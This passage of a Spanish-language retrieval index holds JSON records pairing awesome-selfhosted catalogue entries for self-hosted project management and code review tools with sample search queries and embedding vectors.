-0.03184, 0.06825, -0.00319, -0.01456, 0.09837, 0.00022, -0.03831, 0.03325, 0.02987, -0.02341, -0.06618, 0.0278, -0.01419, 0.04735, 0.00383, -0.01071, -0.06944, 0.05579, 0.02732, -0.01893, 0.00698, -0.07323, 0.13156, 0.01422, 0.05577, 0.11392, -0.07732, 0.03181, -0.04094, -0.04385, 0.04427, 0.0337, -0.05625, -0.04005, 0.0194, 0.01346, -0.01268, 0.02598, -0.07054, 0.00822, 0.02576, 0.05131, 0.05661, 0.02004, 0.02715, 0.00666, -0.01353, -0.06243, -0.07576, 0.01858, -0.01658, 0.0521, 0.03896, -0.03257, -0.05168, 0.05221, 0.07636, -0.04987, 0.00521, -0.04016, -0.01412, -0.09118, 0.01821, -0.01976, -0.06123, -0.06746, 0.04368, -0.00079, -0.07193, 0.03929, -0.02174]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "que programa hay para gestionar proyectos y tareas sin necesidad de JIRA", "v": [-0.08527, 0.05931, -0.13989, -0.24342, 0.14924, -0.07245, 0.02768, 0.07287, -0.03203, 0.01218, -0.00131, 0.01047, 0.13909, -0.03269, 0.07597, 0.0872, 0.11567, -0.03186, -0.01935, 0.00256, -0.12213, 0.07843, 0.06167, -0.00209, -0.14247, 0.06615, -0.02316, -0.12292, -0.00815, 0.09705, 0.01449, -0.04863, 0.19358, -0.17069, 0.09034, 0.05248, -0.02055, 0.0391, -0.0334, 0.03509, -0.0231, 0.08828, 0.01498, 0.04553, 0.07157, 0.08829, 0.14997, -0.12325, -0.01935, -0.00988, -0.08969, 0.05427, -0.07793, 0.00084, 0.11328, -0.04108, -0.02617, -0.139, -0.1444, -0.08651, -0.11542, 0.12313, -0.05056, -0.07975, 0.1071, -0.04762, 0.0902, -0.01479, -0.05972, 0.04218, 0.01309, 0.00293, -0.02091, -0.0822, -0.03637, -0.06495, 0.01967, -0.00548, -0.01386, -0.06944, 0.0063, 0.02344, -0.00168, 0.075, -0.06313, -0.06108, -0.01872, 0.00708, -0.0134, -0.0131, -0.05632, -0.02554, -0.00036, -0.05666, 0.04983, 0.00309, 0.10567, 0.10837, 0.08793, 0.03106, -0.05164, -0.08651, -0.06983, 0.07287, -0.05794, 0.17523, 0.09688, -0.00191, -0.02092, 0.01193, -0.07325, 0.00285, 0.04445, -0.06661, -0.05041, 0.02858, -0.03943, -0.01077, 0.01442, -0.06755, -0.04996, -0.03643, 0.02601, 0.04821, 0.1042, -0.08684, 0.02271, 0.08897, 0.03736, 0.05317, -0.0147, 0.0195, -0.01398, 0.00047, -0.08415, 0.00298, 0.03306, -0.03385, -0.03456, -0.07767, -0.13458, 0.0788, 0.01568, -0.00548, 0.07962, 0.02632, 0.03368, -0.03074, 0.05351, 0.01756, 0.04234, -0.04402, -0.00928, 0.05123, -0.00456, -0.01819, 0.01302, 0.0416, -0.02951, 0.0514, -0.04745, 0.02023, -0.00902, 0.01526, 0.02879, -0.05259, 0.0083, 0.08335, 0.06776, 0.10066, -0.03352, 0.0091, 0.00243, -0.03652, 0.03189, -0.07897, 0.05119, -0.0762, 0.08969, -0.02805, -0.10427, 0.01761, 0.06004, 0.05284, 0.00236, -0.09311, -0.06149, 0.0263, -0.02279, 0.01949, -0.01566, -0.01121, -0.0072, -0.01566, 0.04262, 0.00311, -0.04575, 0.0055, 0.03576, 0.01435, -0.03127, -0.07915, 0.04126, 0.0371, -0.03771, 0.08465, -0.00694, 0.07109, 0.08233, 0.08634, 0.06367, -0.02536, -0.02363, -0.04118, -0.02112, -0.02521, -0.00883, 0.0317, 0.05719, 0.05727, -0.01334, -0.04232, 0.02606, 0.01137, 0.03281, -0.04387, 0.05305, 0.06565, 0.02622, 0.01416, -0.00657, 0.00497, -0.01102, -0.00827, 0.04363, -0.01832, -0.00667, -0.01657, -0.0025, -0.02253, 0.01344, 0.06583, 0.03952, -0.03768, -0.06344, 0.02099, -0.07604, 0.03516, -0.01949, -0.00483, -0.08295, 0.05059, 0.01347, 0.01115, 0.06099, 0.00106]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "con que puedo montar un sistema completo para el seguimiento de issues y CI/CD en casa", "v": [-0.05184, 0.11264, -0.10964, 0.01372, -0.11009, -0.19269, -0.01973, 0.11595, -0.12633, -0.05649, -0.07012, -0.06022, -0.09799, -0.1549, 0.01232, -0.0301, 0.04636, -0.06977, -0.00519, -0.05067, -0.04377, -0.13876, 0.02279, -0.0194, 0.01682, 0.1699, 0.08074, -0.12473, -0.1195, 0.05062, 0.06409, 0.05352, 0.08276, 0.12448, -0.05511, -0.09037, -0.05085, -0.01986, -0.07382, -0.05992, -0.01669, -0.02634, 0.0129, 0.02902, 0.15855, -0.13549, 0.10237, -0.08872, -0.0337, -0.11422, -0.06602, 0.02195, -0.19941, -0.06535, -0.03644, -0.09738, -0.01148, -0.0454, 0.12795, -0.081, 0.02372, 0.15429, 0.02247, 0.12804, 0.08846, 0.02533, -0.07296, -0.04064, -0.02856, -0.03034, -0.07982, -0.05455, -0.01103, -0.06224, -0.02065, -0.01618, -0.01433, -0.07697, 0.03918, -0.07314, 0.04167, 0.05041, -0.0344, 0.0625, 0.06684, 0.06628, 0.01973, -0.07988, -0.01908, -0.00714, 0.02421, -0.01148, 0.04539, 0.07268, 0.03338, -0.10958, 0.06149, 0.07905, -0.06904, -0.05201, 0.039, -0.00318, 0.01111, 0.13129, -0.01292, -0.02749, 0.09191, -0.00591, 0.02617, 0.01405, -0.07407, 0.09816, -0.06818, 0.01082, -0.08643, -0.04718, -0.01591, 0.05854, 0.00832, 0.01673, -0.07384, 0.12457, -0.0372, -0.06437, 0.01037, -0.08128, 0.09741, 0.02096, -0.06209, 0.04708, -0.01664, -0.01918, -0.04883, -0.01433, 0.0786, -0.02313, -0.11256, 0.03302, -0.03472, 0.0078, 0.01363, 0.07781, -0.02311, -0.07003, 0.10543, 0.01407, -0.02997, -0.03864, 0.00411, 0.00876, -0.00174, 0.13461, 0.06132, -0.06717, 0.04811, -0.03376, 0.08657, 0.04864, 0.05744, -0.04996, 0.05696, 0.05684, 0.01315, -0.06387, 0.01016, 0.06527, 0.05872, -0.00876, 0.03318, -0.01919, -0.09407, 0.07817, 0.04976, -0.07449, 0.01105, -0.03911, 0.01093, -0.04212, -0.00556, -0.01301, -0.1108, 0.07199, 0.01342, 0.03215, 0.02555, 0.00636, -0.01641, 0.03008, -0.01061, -0.06303, 0.01459, -0.00676, 0.00859, 0.02535, -0.02925, 0.00932, -0.06801, -0.03444, 0.01396, 0.03194, -0.1122, 0.00865, 0.06617, -0.01303, -0.00117, 0.00837, 0.06837, 0.05078, 0.0528, 0.03206, 0.00532, -0.02553, 0.06366, 0.00523, -0.07564, 0.03364, -0.02069, 0.02275, 0.00857, 0.04488, 0.06444, 0.08049, 0.02023, 0.01808, 0.02729, 0.01613, -0.01349, 0.00322, 0.05, 0.01336, -0.01017, -0.03221, 0.01404, 0.04072, 0.03439, -0.02368, 0.0179, 0.01016, -0.05512, -0.01139, 0.04234, 0.09055, 0.05197, 0.02006, -0.02207, -0.09279, -0.01642, 0.01758, 0.01877, -0.05466, -0.00305, -0.01092, -0.00129, -0.03088, 0.00509, -0.01185]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue Tracking, and CI/CD. Simple yet Powerful [MIT, Java/Docker/K8S]. OpenProject β€” Manage your projects, tasks and goals. Collaborate via work packages and link them to your pull requests on Github [GPL-3.0, Ruby/deb/Docker]. Pagure β€” Lightweight, powerful, and flexible git-centric forge with features laying the foundation for federated and decentralized development [GPL-2.0, Docker/Python/deb]. Phorge β€” Community-driven platform for collaborating, managing, organizing and reviewing software development projects [Apache-2.0, PHP]. Plane β€” Track issues, epics, and product roadmaps in the simplest way possible (alternative to JIRA, Linear and Height) [AGPL-3.0, Docker]. ProjeQtOr β€” Complete, mature, multi-user project management system with extensive functionality for all phases of a project [AGPL-3.0, PHP]. Redmine β€” Flexible project management web application [GPL-2.0, Ruby].", "indexar": "cuΓ‘l es una alternativa libre a Linear para la gestiΓ³n de roadmaps", "v": [0.07607, 0.03428, 0.06489, -0.04277, -0.02501, -0.03951, -0.08823, -0.00285, -0.12189, 0.01975, -0.0947, -0.21525, 0.05415, 0.06074, 0.11618, 0.02621, -0.03012, -0.06834, 0.01235, -0.02325, -0.15159, 0.09882, -0.09189, -0.06509, -0.00875, -0.01711, 0.11352, -0.13456, -0.09616, -0.00879, -0.04322, -0.00037, 0.0863, 0.0054, -0.00371, 0.01078, 0.10937, 0.15324, 0.0026, -0.02545, -0.07127, -0.057, 0.01791, 0.14262, 0.06741, -0.14026, -0.03421, 0.06671, 0.01768, 0.00237, -0.08071, -0.03555, -0.01531, 0.09422, 0.15535, -0.04766, 0.01241, -0.10859, -0.07067, -0.02081, -0.07728, -0.01591, 0.04706, 0.00096, 0.03645, 0.02291, -0.01713, -0.0101, -0.06879, 0.10144, 0.11953, -0.02585, 0.0795, 0.05313, -0.07243, -0.0101, 0.01966, 0.07022, -0.01413, 0.11772, 0.216, -0.03716, -0.05749, 0.09522, 0.03432, -0.03707, 0.065, -0.04826, 0.03704, 0.05812, -0.03745, -0.05361, -0.06169, 0.02808, -0.08151, -0.01625, -0.00827, 0.06609, -0.00592, -0.00308, 0.02709, -0.03754, -0.15496, 0.02456, -0.01694, 0.05503, 0.00949, 0.01788, -0.10263, 0.09184, -0.00801, 0.04713, 0.04511, 0.03848, -0.05845, -0.00832, 0.00492, 0.10656, -0.04926, -0.04121, 0.00535, -0.01416, -0.05457, -0.13146, 0.08092, 0.07235, 0.03491, 0.07093, -0.01809, 0.02676, -0.00704, -0.01268, -0.08738, -0.1201, -0.11485, 0.00954, 0.01128, -0.00338, 0.05926, 0.03872, -0.10433, 0.03021, -0.01597, 0.00985, -0.00861, -0.09822, -0.00906, -0.04635, 0.01155, 0.03908, -0.04221, -0.03355, 0.00171, 0.09312, -0.0413, 0.01334, -0.01768, 0.01781, -0.07591, 0.04995, 0.06729, -0.06445, -0.07934, 0.10072, 0.02056, -0.04469, 0.01552, 0.03993, -0.04396, 0.01354, 0.07055, 0.12274, 0.07814, -0.04492, 0.03568, -0.1443, 0.01316, -0.12094, 0.04241, -0.02501, 0.01528, -0.0145, -0.03054, 0.02772, -0.00654, -0.02066, -0.0532, -0.0195, 0.0198, 0.0487, 0.00703, -0.02516, 0.01269, -0.0888, -0.02158, 0.0084, 0.08573, 0.00309, -0.07383, -0.04276, -0.08897, -0.04273, 0.0303, -0.0227, -0.00634, -0.0116, -0.02344, 0.05075, 0.02498, 0.07612, 0.07593, -0.02668, 0.09397, 0.01225, -0.01015, 0.00281, -0.02624, -0.00586, 0.03261, -0.00494, 0.03919, 0.07113, -0.0777, -0.01599, -0.02048, 0.05061, -0.03542, 0.00105, -0.05961, -0.0253, 0.07519, -0.01137, 0.01121, 0.06372, -0.0316, -0.04963, -0.01043, 0.02631, 0.05779, -0.04969, 0.06747, 0.09953, -0.03371, 0.00459, -0.06111, -0.05152, -0.02418, -0.05426, -0.05493, -0.06117, -0.02544, -0.04837, 0.01355, 0.09024, 0.0043, -0.03863]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "que programa puedo usar para revisar el cΓ³digo de mi proyecto", "v": [-0.05132, 0.02091, -0.22261, -0.16262, 0.05341, -0.1697, -0.01762, 0.00101, -0.12249, -0.17983, -0.05758, -0.15163, 0.02884, -0.09575, 0.018, -0.07318, 0.14552, -0.00437, 0.08752, -0.02072, 0.01302, -0.08706, -0.07511, -0.042, -0.02261, 0.08297, 0.02519, -0.01278, 0.00511, -0.06859, -0.0144, -0.00794, 0.15136, -0.03475, -0.05904, 0.04289, 0.14698, 0.06723, 0.03098, 0.06781, 0.00543, 0.06152, -0.04345, 0.01966, 0.05718, -0.08383, 0.11663, -0.01001, -0.10373, -0.0077, -0.07393, 0.0254, -0.11252, 0.03205, 0.06619, -0.06443, 0.01891, -0.11054, -0.15063, 0.03957, 0.06542, -0.10221, 0.05833, -0.1098, 0.00878, -0.07556, 0.04927, 0.08622, -0.12369, 0.05624, 0.00262, 0.08879, -0.03447, -0.11078, -0.01028, 0.00576, 0.00101, -0.13854, 0.03263, -0.03003, -0.07772, 0.01754, 0.00146, 0.05669, -0.04745, -0.03452, -0.02777, -0.07507, 0.03954, -0.01754, -0.018, -0.01254, 0.02634, 0.01792, 0.03202, 0.00074, 0.11724, 0.06113, 0.05243, 0.00786, 0.05842, -0.11151, 0.03635, 0.08492, 0.08451, 0.07384, 0.07061, 0.03066, -0.01849, 0.05883, -0.09512, -0.03832, -0.12877, -0.10664, -0.1345, -0.01926, -0.07222, 0.00299, 0.03896, -0.10039, -0.04721, 0.05763, -0.0706, 0.03353, 0.10988, 0.03436, 0.00749, 0.09895, -0.04825, 0.02562, -0.06252, 0.0148, -0.04187, -0.0175, -0.05886, -0.02331, 0.02238, 0.00333, 0.03153, 0.08384, -0.03295, 0.06313, 0.02578, 0.12735, 0.01251, 0.00588, -0.02504, -0.03759, -0.01968, -0.03055, 0.04029, 0.02374, -0.0233, 0.0293, -0.09245, -0.00254, 0.07668, 0.03219, -0.04287, -0.00587, -0.09657, -0.01027, -0.00567, -0.03068, 0.0707, -0.05622, 0.01158, 0.01446, 0.07684, 0.05209, 0.03493, 0.00627, 0.07114, -0.06388, 0.06734, -0.03589, 0.00592, -0.0389, -0.0013, -0.03095, -0.08532, 0.09267, 0.04323, -0.01849, 0.01979, -0.02945, 0.00862, 0.07628, 0.00875, 0.00283, -0.04728, 0.05208, 0.05657, 0.00859, -0.01431, 0.00732, 0.02233, 0.01717, -0.0021, -0.08064, -0.03194, 0.02461, 0.00878, -0.04939, 0.02484, 0.03942, -0.02343, 0.01493, 0.02288, 0.10666, 0.03409, -0.07825, 0.07453, 0.0225, -0.02831, 0.00404, -0.02653, 0.08059, 0.11404, 0.00388, 0.00119, -0.02728, -0.0054, 0.05302, 0.02063, -0.06495, 0.01029, 0.01818, -0.02995, 0.00849, 0.0152, -0.0125, -0.0468, -0.00838, 0.04538, -0.01529, -0.01852, 0.00113, -0.04045, -0.06231, -0.00048, 0.09921, -0.02652, -0.0285, 0.00162, 0.02197, -0.06177, -0.02291, -0.04352, 0.00148, -0.03167, 0.01557, 0.05914, -0.10761, 0.03306, 0.06117]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "cual es una alternativa gratuita a las herramientas de gestiΓ³n de repositorios Git", "v": [0.04311, 0.0676, -0.04938, -0.14794, 0.05736, -0.04579, -0.05687, -0.01742, -0.15107, -0.00642, -0.02531, -0.06391, -0.0339, 0.04074, 0.1532, -0.04434, 0.10008, -0.11719, -0.01778, 0.05691, -0.09937, 0.08223, 0.04974, -0.05259, -0.11763, -0.06545, 0.10023, -0.09123, -0.10516, 0.1302, 0.08249, -0.03804, -0.04722, -0.12714, -0.20895, 0.06351, 0.07625, 0.10871, 0.08527, 0.00579, -0.02075, -0.09292, -0.05948, 0.0981, 0.01449, -0.21329, 0.04871, 0.0318, -0.0216, 0.00366, -0.11364, -0.0922, -0.02429, -0.00497, 0.06428, -0.08835, 0.18219, -0.15764, -0.08363, -0.04042, -0.1091, 0.04945, 0.0299, 0.04146, -0.05049, -0.02574, -0.04666, -0.0422, -0.17857, 0.12805, -0.02978, 0.02324, 0.0305, -0.01914, -0.07244, -0.04876, -0.0207, 0.05727, -0.06663, 0.06506, 0.04098, -0.04882, 0.04443, 0.07993, -0.12775, -0.07707, 0.0255, -0.05394, 0.07185, -0.0538, -0.09235, -0.06901, -0.06349, 0.03828, -0.01973, -0.0704, 0.11876, -0.04413, -0.0096, -0.00683, 0.08375, 0.00463, -0.07933, 0.01219, 0.01447, 0.06571, -0.03021, 0.01455, -0.08795, 0.02331, 0.0142, 0.0654, 0.03192, 0.06965, 0.05036, 0.01963, -0.03611, -0.03357, -0.02112, -0.03424, -0.00597, 0.00548, -0.08754, -0.05089, 0.09905, 0.08291, 0.07303, 0.00644, -0.02155, -0.01978, 0.06379, -0.08589, -0.04429, -0.06137, -0.11803, -0.06122, 0.04805, -0.06769, -0.03392, -0.09395, -0.01249, 0.03563, 0.02605, -0.04918, 0.06766, -0.07432, 0.04625, -0.04405, 0.0552, -0.03719, -0.03751, -0.05648, 0.05952, 0.095, -0.0624, 0.03325, -0.02947, 0.0197, -0.12692, 0.01902, 0.02277, -0.04576, -0.01762, 0.07211, -0.04782, -0.04137, 0.07455, 0.0681, -0.04621, 0.01881, 0.04794, 0.07097, 0.02294, -0.03462, -0.00855, -0.08623, -0.01296, -0.13251, 0.0187, -0.05823, 0.01392, 0.00698, -0.08244, -0.01434, 0.00922, -0.06717, 0.00593, -0.02294, -0.00531, 0.04621, 0.01671, -0.01124, -0.03158, -0.09167, 0.07826, 0.02504, -0.02337, -0.03479, -0.06383, 0.02249, -0.03581, -0.00845, 0.00234, -0.00977, -0.03314, -0.00704, -0.02576, 0.00379, -0.01918, 0.01033, 0.02329, 0.02688, 0.02491, -0.05321, -0.00246, -0.02385, -0.04692, -0.013, 0.00135, -0.04889, 0.01581, -0.02387, 0.05804, 0.00197, -0.0277, 0.01454, -0.00566, 0.05814, -0.04126, -0.00291, 0.0351, -0.00589, 0.01171, -0.001, 0.00079, -0.03388, 0.01608, 0.04293, -0.00198, 0.01766, 0.00548, 0.0824, 0.00496, 0.01721, -0.04267, 0.00833, -0.03451, -0.03214, -0.02621, -0.0383, -0.02424, 0.02551, 0.0002, -0.01441, -0.01961, -0.00476]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Review Board β€” Extensible and friendly code review tool for projects and companies of all sizes [MIT, Python/Docker]. RhodeCode β€” Unify and simplify repository management for Git, Subversion, and Mercurial [AGPL-3.0, Python]. Rukovoditel β€” Configurable open source project management, web-based application [GPL-2.0, PHP]. SCM Manager β€” The easiest way to share and manage your Git, Mercurial and Subversion repositories over http [BSD-3-Clause, Java/deb/Docker/K8S]. ShipShipShip β€” Changelog and roadmap platform that bridges project management and customer communication [Apache-2.0, Docker]. Smederee β€” A frugal platform which is dedicated to help people build great software together leveraging the power of the Darcs version control system [AGPL-3.0, Scala]. Sourcehut β€” A full web git interface with no javascript [GPL-2.0, Go]. Taiga β€” Agile Project Management Tool based on the Kanban and Scrum methods [MPL-2.0, Docker/Python/Nodejs].", "indexar": "con que herramienta puedo organizar mi trabajo usando mΓ©todos Γ‘giles", "v": [-0.00633, 0.1215, -0.18343, -0.13949, 0.00802, -0.05731, -0.08356, 0.06539, -0.1797, -0.06135, -0.10545, -0.06297, 0.06157, -0.01598, 0.14422, -0.01972, 0.1571, -0.15494, -0.08385, 0.04302, -0.03173, 0.06536, -0.14632, 0.00788, -0.02331, -0.04783, 0.15813, -0.02222, -0.16005, 0.02355, -0.07042, 0.10804, 0.07041, -0.15776, -0.02645, -0.01876, -0.1037, 0.08675, -0.08222, -0.04465, -0.18893, 0.02837, -0.16262, 0.08171, 0.11081, -0.02434, -0.04174, -0.04736, -0.15238, 0.18231, -0.00694, -0.10491, -0.06445, -0.06506, -0.05102, -0.11905, 0.05997, -0.07396, -0.0432, -0.05473, -0.0183, 0.05601, -0.01684, 0.06301, 0.09012, 0.04331, 0.03984, -0.06436, -0.0976, 0.08139, -0.00493, 0.01241, -0.04961, -0.06826, 0.05306, -0.01635, 0.02858, 0.09412, 0.01028, -0.04016, 0.00824, 0.00277, -0.02188, 0.0618, -0.09255, -0.12162, -0.01499, -0.04371, 0.01534, -0.10931, -0.08147, -0.0016, 0.02485, -0.03822, -0.00677, -0.0168, 0.06988, 0.00991, 0.03882, 0.00573, 0.10059, -0.01934, -0.0559, 0.04779, -0.0327, -0.01978, -0.02848, 0.0349, -0.05414, -0.05407, -0.02405, 0.04688, 0.00434, 0.02294, -0.05332, -0.01752, 0.01663, -0.01495, -0.0296, -0.06181, 0.09086, 0.07007, -0.03601, 0.03367, 0.03393, -0.1091, 0.06691, 0.12058, -0.00988, -0.06407, 0.01684, -0.03203, -0.11605, 0.0214, 0.00716, -0.00898, 0.00926, -0.14642, 0.04583, -0.09023, -0.06699, 0.03601, -0.03596, -0.09954, 0.05759, 0.06155, 0.00649, -0.04949, -0.07636, -0.09147, 0.02557, -0.04885, -0.00621, 0.04307, -0.06921, -0.03879, -0.00347, -0.00348, -0.09088, 0.03128, -0.00574, 0.00544, -0.0111, 0.01058, 0.00134, -0.03641, 0.07085, 0.00666, 0.00762, 0.04328, 0.00684, 0.02402, 0.08261, -0.04831, 0.02316, -0.01037, -0.01232, -0.01328, 0.07274, -0.02088, 0.02406, 0.08681, -0.04521, -0.03902, 0.03513, -0.04298, 0.07246, 0.02168, -0.01336, 0.05901, -0.00148, 0.02337, 0.07358, -0.06454, 0.00864, 0.00324, 0.00149, -0.02998, 0.00699, -0.01072, -0.01304, -0.06728, -0.00184, -0.01838, 0.03236, 0.03068, -0.06982, 0.01763, -0.00101, 0.03824, 0.06089, -0.02118, 0.02858, -0.0156, -0.03257, 0.02783, -0.02804, -0.04198, -0.03104, -0.02292, 0.00628, 0.01129, 0.00057, -0.01342, -0.02097, -0.01995, 0.0093, -0.0008, 0.02256, 0.01627, 0.0413, 0.00219, -0.04142, -0.00513, -0.00346, -0.04169, 0.03549, -0.0436, -0.03911, -0.01114, 0.00782, 0.02122, -0.02376, -0.02127, -0.07789, -0.03637, 0.00086, -0.00479, -0.05349, -0.02544, 0.01699, 0.00585, 0.05175, -0.05379, -0.03017, -0.04309]} +{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project management system/tool [AGPL-3.0, PHP].", "indexar": "que programa hay para gestionar proyectos de software en equipo", "v": [-0.04716, 0.02855, -0.09999, -0.3174, 0.02873, -0.13427, -0.00102, -0.03371, -0.06834, -0.11242, -0.02153, -0.00634, 0.02163, -0.06928, 0.01053, 0.077, 0.14053, -0.13203, 0.02409, 0.07664, -0.02297, 0.06974, 0.00499, -0.0652, 0.00644, 0.00132, 0.02318, -0.06531, -0.03265, 0.03862, 0.0229, -0.00291, 0.08722, -0.14095, 0.0494, -0.02902, 0.05336, 0.00399, 0.05564, 0.04208, -0.02878, -0.04162, -0.0215, -0.01688, 0.1769, -0.03005, 0.15224, -0.06758, 0.0478, -0.09069, -0.06641, -0.01073, 0.00533, -0.05554, 0.11166, -0.12772, -0.02042, -0.15124, -0.0818, -0.06282, -0.0581, 0.04305, -0.03127, -0.03029, 0.05667, 0.04526, 0.05638, -0.03963, -0.1234, 0.01059, 0.01352, 0.04058, 0.05783, -0.05948, -0.00079, -0.02786, 0.014, 0.04141, -0.0443, -0.08608, -0.00856, 0.05701, -0.02316, 0.08229, -0.06093, -0.09578, 0.05705, 0.02146, 0.03454, -0.02522, -0.03689, -0.02873, -0.07703, -0.00341, 0.04641, 0.02828, 0.19456, 0.05382, 0.04724, 0.08209, -0.09359, -0.05682, -0.07902, 0.09152, -0.10449, 0.10786, 0.10352, -0.02518, -0.03794, 0.05822, -0.06124, -0.00698, 0.01616, 0.00619, -0.02716, 8e-05, 0.00654, -0.03203, 0.06418, -0.05735, -0.01375, -0.04155, -0.03455, -0.01043, 0.08956, -0.04464, 0.00379, 0.08073, -0.03524, 0.06163, -0.0493, -0.0153, -0.04702, 0.03899, -0.14898, -0.00013, 0.02994, 0.02109, 0.00886, -0.02915, -0.12826, 0.09528, -0.01195, 0.03713, 0.07414, -0.04601, -0.03372, -0.03978, 0.06604, 0.04514, 0.08848, -0.01599, -0.03378, 0.05517, -0.12081, 0.02525, 0.05172, 0.0444, -0.08899, 0.02971, -0.09901, -0.00347, -0.02761, -0.00189, 0.04917, -0.05846, 0.00994, 0.09565, 0.10049, 0.07376, -0.03385, 0.06482, 0.06613, -0.05184, -0.00072, -0.04287, 0.03545, -0.12552, 0.01394, -0.04427, -0.10938, 0.01682, 0.08161, 0.06416, -0.00424, -0.00273, -0.08562, 0.09342, -0.03716, 0.01619, -0.05424, 0.05115, 0.01511, -0.06058, 0.04073, 0.02346, -0.02524, 0.01723, 0.03233, 0.00969, -0.04375, -0.00273, 0.0592, 0.05411, -0.02794, 0.09472, -0.00261, 0.06004, 0.0452, 0.11602, 0.0532, 0.00596, -0.00435, 0.03619, -0.05441, -0.03058, 0.00387, 0.05733, 0.06288, 0.05154, -0.00481, -0.0548, 0.03645, 0.04408, 0.00754, -0.06873, 0.01244, 0.09514, 0.00345, -0.00785, 0.00188, 